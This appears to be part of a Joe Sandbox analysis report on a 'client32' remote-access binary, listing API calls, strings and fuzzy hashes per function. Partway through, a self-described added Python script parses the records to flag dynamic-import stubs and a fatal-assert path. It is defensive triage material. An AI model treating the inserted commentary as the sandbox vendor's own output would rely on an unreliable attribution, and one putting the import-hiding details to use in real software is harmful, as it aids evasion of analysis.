• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                    • String ID: vector<T> too long
                                                                                                                                                                                                    • API String ID: 1785806476-3788999226
                                                                                                                                                                                                    • Opcode ID: 70da0191b5718e9e378a282df170df22699940ec89f022486c233822fbc6cd1e
                                                                                                                                                                                                    • Instruction ID: facce5f6267de455672404faedde13971752726d79346e18a4f89ee43adb8f58
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70da0191b5718e9e378a282df170df22699940ec89f022486c233822fbc6cd1e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF014FB6A007055FD720DE6DD880DA7F7E8EF95658310862EE5A6C3644EE31F9508AA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
Yara matches
Similarity
• API ID: _free
• String ID: Client$IgnoreBroadcastMsg
• API String ID: 269201875-2698719660
• Opcode ID: 406f8391fbd20ee1c0b2c9e892d905c69960e8590cde297a0bd1aef1293b93f6
• Instruction ID: 7f2d190c9cc5e7471165cdc2c35737031f60f48fc0dccb1818e423c3a41c3cb6
• Opcode Fuzzy Hash: 406f8391fbd20ee1c0b2c9e892d905c69960e8590cde297a0bd1aef1293b93f6
• Instruction Fuzzy Hash: CC01F976E0511A96DBC1DEA5EC81B5BB79C9F42318F044471E919DA185FE30F8408B72
APIs
• wvsprintfA.USER32(?,11190240,?), ref: 110CF052
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
• String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
• API String ID: 175691280-2052047905
• Opcode ID: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
• Instruction ID: ac41a9a0db9df06f4d8a16ffcac00abdbc7d2a047ef6ca5be1778eb271469bd1
• Opcode Fuzzy Hash: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
• Instruction Fuzzy Hash: A8F0A479A0412D7BDB40DAA8DC40BEEFBBD9B45A04F4040EDEA45A7240DF306E498BA5
APIs
• wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                                                                                    • Opcode ID: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
                                                                                                                                                                                                    • Instruction ID: b1f8247c4ebfb1806b65041ddde5ed66821e01f400e323cd5dcc56784af5e4be
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0A475A0012DBBDB50DA98DC80BEEFFAC9B45604F1040A9EA09A7140DF306A45C7A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeferWindowPos.USER32(8B000E80,00000000,F8E85BC0,33CD335E,?,00000000,33CD335E,11076276), ref: 11075563
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11075536
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11075531
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DeferErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 889670253-2830328467
                                                                                                                                                                                                    • Opcode ID: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
                                                                                                                                                                                                    • Instruction ID: 0f53da842d51b2bc1a575ce598d94f232e02cc1422780aacd45dca11e73889ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ec77db6c4667eb89bd7fa16fa81bbec39534bd321d44308b88f3494834766c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF01CB661021DAFC704CE89DC80EEBB3EDEB9C754F008119FA19D3250D630E950CBA4
APIs
• GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
• SetLastError.KERNEL32(00000078), ref: 11017039
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: QueueUserWorkItem
• API String ID: 199729137-2469634949
• Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
• Instruction ID: 351e0e434b9127e3d5833c8cdc34dd988e3f21fb5a429389f6b6525592fa6d03
• Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
• Instruction Fuzzy Hash: 6DF08C32A10328AFC310DFA8D844E9BB7A8FB48721F40842AF94087600C630F8008BA0
APIs
• GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
• SetLastError.KERNEL32(00000078), ref: 11031055
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorLastProc
• String ID: ProcessIdToSessionId
• API String ID: 199729137-2164408197
• Opcode ID: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
• Instruction ID: c15e5fa19e0f6f6798f22c3181eac8c4efc8dc53165636b7ac94afd6ac4f5e0b
• Opcode Fuzzy Hash: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
• Instruction Fuzzy Hash: A9E06532A552245FC310DFB5D844E56F7E8EB58762F00C52AF95997200C670A801CFA0
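The per-function records in this listing are verbose, and an analyst usually wants them reduced to one row per function: entry address, API ID, fuzzy hash, and whether the function matches a pattern worth noting. Two such patterns are visible in this client32 listing: a resolver stub that calls GetProcAddress for a named export (QueueUserWorkItem, ProcessIdToSessionId) and then SetLastError(0x78), where 0x78 is the documented Win32 value ERROR_CALL_NOT_IMPLEMENTED, which is consistent with a compatibility shim for exports missing on older Windows and means the import does not show in the static import table; and the CTL32 assertion path GetLastError, wsprintfA, MessageBoxA("Client32"), ExitProcess. The script below is an added example, not Joe Sandbox's or NetSupport's code. Its SAMPLE is copied (abridged) from this page's records and is the only input it runs on; the section names follow the report layout, while the bullet-parsing rules and the two pattern labels ("dynamic import", "fatal assert handler") are this example's own assumptions.

```python
"""Triage Joe Sandbox per-function records: one summary row per function.

Added example, not Joe Sandbox's or NetSupport's code. SAMPLE is copied
(abridged) from this page's client32 records; the parsing rules and the
two pattern labels below are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed input: four records copied (abridged) from this page's listing.
SAMPLE = r"""
APIs
• DeferWindowPos.USER32(8B000E80,00000000,F8E85BC0,33CD335E,?,00000000,33CD335E,11076276), ref: 11075563
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
• m_hWnd, xrefs: 11075536
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11075531
Yara matches
Similarity
• API ID: DeferErrorExitLastMessageProcessWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• Instruction Fuzzy Hash: 3FF01CB661021DAFC704CE89DC80EEBB3EDEB9C754F008119FA19D3250D630E950CBA4
APIs
• GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
• SetLastError.KERNEL32(00000078), ref: 11017039
Strings
Similarity
• API ID: AddressErrorLastProc
• String ID: QueueUserWorkItem
APIs
• GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
• SetLastError.KERNEL32(00000078), ref: 11031055
Similarity
• API ID: AddressErrorLastProc
• String ID: ProcessIdToSessionId
APIs
• GetWindowTextLengthA.USER32(75BF1A30), ref: 11157303
  • Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2
• GetWindowTextA.USER32(75BF1A30,00000000,00000001), ref: 1115731D
Strings
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Yara matches", "Similarity")
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
ERROR_CALL_NOT_IMPLEMENTED = 0x78  # documented Win32 error 120


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    subcall: str = ""  # callee address when the call sits inside a subcall


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)


def parse_records(text):
    """One FunctionRecord per 'APIs' heading; bullets are routed by section."""
    records, section, rec = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                rec = FunctionRecord()
                records.append(rec)
            section = line
        elif line.startswith("•") and rec is not None:
            body = line.lstrip("•").strip()
            if section == "APIs" and (m := API_RE.match(body)):
                args = m["args"].split(",") if m["args"] else []
                rec.calls.append(ApiCall(m["api"], m["mod"], args,
                                         int(m["ref"], 16), m["sub"] or ""))
            elif section == "Strings":
                s, _, xref = body.rpartition(", xrefs: ")
                rec.strings.append((s, int(xref, 16)))
            elif section == "Similarity":
                key, _, value = body.partition(": ")
                rec.similarity[key] = value
    return records


def dynamic_import(rec):
    """GetProcAddress(?, Name) then SetLastError(0x78): a resolver stub that
    reports ERROR_CALL_NOT_IMPLEMENTED when the export is absent. Returns Name."""
    name = None
    for c in rec.calls:
        if c.api == "GetProcAddress" and len(c.args) == 2 and c.args[1] != "?":
            name = c.args[1]
        elif (c.api == "SetLastError" and name and c.args and c.args[0] != "?"
              and int(c.args[0], 16) == ERROR_CALL_NOT_IMPLEMENTED):
            return name
    return None


def has_fatal_assert_handler(rec):
    """GetLastError -> wsprintfA -> MessageBoxA -> ExitProcess inside one
    subcall: the CTL32 assertion path that shows a 'Client32' box and exits."""
    wanted = ("GetLastError", "wsprintfA", "MessageBoxA", "ExitProcess")
    by_sub = {}
    for c in rec.calls:
        if c.subcall:
            by_sub.setdefault(c.subcall, []).append(c.api)
    for apis in by_sub.values():
        it = iter(apis)
        if all(w in it for w in wanted):  # ordered subsequence match
            return True
    return False


def summarize(records):
    rows = []
    for rec in records:
        own = [c.ref for c in rec.calls if not c.subcall]
        rows.append({
            "first_ref": f"{min(own):08X}" if own else None,
            "api_id": rec.similarity.get("API ID"),
            "dynamic_import": dynamic_import(rec),
            "fatal_assert_handler": has_fatal_assert_handler(rec),
            "instruction_fuzzy_hash": rec.similarity.get("Instruction Fuzzy Hash"),
        })
    return rows


if __name__ == "__main__":
    for row in summarize(parse_records(SAMPLE)):
        print(row)
```

Running it prints four rows: the DeferWindowPos function is flagged for the fatal assert handler, the two GetProcAddress stubs are flagged with the export names they resolve, and the GetWindowText function matches neither. The same parser applies to the full listing once it is saved as text, since every record opens with an "APIs" heading and the Similarity block carries the API ID and fuzzy hashes used for cross-sample comparison.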
APIs
• GetWindowTextLengthA.USER32(75BF1A30), ref: 11157303
  • Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2
• GetWindowTextA.USER32(75BF1A30,00000000,00000001), ref: 1115731D
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: TextWindow$Length_memset
                                                                                                                                                                                                    • String ID: ...
                                                                                                                                                                                                    • API String ID: 243528429-1685331755
                                                                                                                                                                                                    • Opcode ID: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
                                                                                                                                                                                                    • Instruction ID: 3e974f6f281fad8de38b3af03667cb2bd2dd56defaaa0821f91d93156a413d34
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7345a46bba17d9f83897ac7903254eada472521389efd1d7f9693f60270457cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE02B36D046635FD281463C9C48DCBFB9DEF82228B458470F595D3201DA20D40BC7E0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(1117B47B,InternetCloseHandle), ref: 11027524
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,110297FB,1117B47B), ref: 11027541
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetCloseHandle
                                                                                                                                                                                                    • API String ID: 199729137-3843628324
                                                                                                                                                                                                    • Opcode ID: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
                                                                                                                                                                                                    • Instruction ID: 0efa5e4b185ac2da0920bc638d9d3d9410d8270d4334fbfed3ee5fbf9e412b31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b6e93195561b6ae7fac2394f1119c484194f36d55897542f86653d00150cad3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20E09272A007345BC320DFA9E844A46F7E8DB24765F40453BEA4197200C670E4448BE0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 11001096
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 2046328329-2830328467
                                                                                                                                                                                                    • Opcode ID: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
                                                                                                                                                                                                    • Instruction ID: d6c174be7095a88acf08c8c7035f1bfcc606cf11c581344454f7ad96a18f94da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e23e6f8f1d795151bf65504b549d0b3e99ba60d83445b273e5f7e54ace8b4032
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68E01AB6610269AFD714DE85EC80EE7B3ACAB48794F008429FA5997240D6B0E95087A1
